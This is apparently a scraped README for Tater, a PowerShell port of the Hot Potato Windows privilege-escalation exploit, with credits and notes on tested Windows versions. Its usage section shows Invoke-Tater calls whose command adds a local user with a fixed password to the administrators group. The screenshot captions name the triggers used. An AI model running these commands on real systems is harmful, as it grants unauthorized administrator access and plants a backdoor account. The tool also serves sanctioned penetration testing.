Tater

Tater is a PowerShell implementation of the Hot Potato Windows Privilege Escalation exploit from @breenmachine and @foxglovesec

3 years after

Tater

Tater is a PowerShell implementation of the Hot Potato Windows Privilege Escalation exploit.

Credit

All credit goes to @breenmachine, @foxglovesec, Google Project Zero, and anyone else that helped work out the details for this exploit.

Potato - https://github.com/foxglovesec/Potato

Notes

This version has been successful for me on Windows 7, Windows 8.1, Windows 10, and Windows Server 2012 R2. I will hopefully be able to test it on Windows Server 2008 soon. Feel free to open issues here or reach out on Twitter @kevin_robertson with successes or failures for the remaining OS versions.

Usage

To import with Import-Module:
Import-Module ./Tater.ps1

To import using dot source method:
. ./Tater.ps1

Invoke-Tater -Trigger 1 -Command "net user tater Winter2016 /add && net localgroup administrators tater /add"

Invoke-Tater -Trigger 2 -Command "net user tater Winter2016 /add && net localgroup administrators tater /add"

Screenshots

Windows 7 using trigger 1 (NBNS WPAD Bruteforce + Windows Defender Signature Updates) tater2

Windows 10 using trigger 2 (WebClient Service + Scheduled Task) tater3

Windows 7 using trigger 1 and UDP port exhaustion tater4

Related Repositories

mustache.js

mustache.js

Minimal templating with {{mustaches}} in JavaScript ...

toml

toml

Tom's Obvious, Minimal Language ...

hurley

hurley

DEAD project, don't use ...

Resource-List

Resource-List

GitHub Project Resource List ...

etoml

etoml

TOML language erlang parser ...


Top Contributors

Kevin-Robertson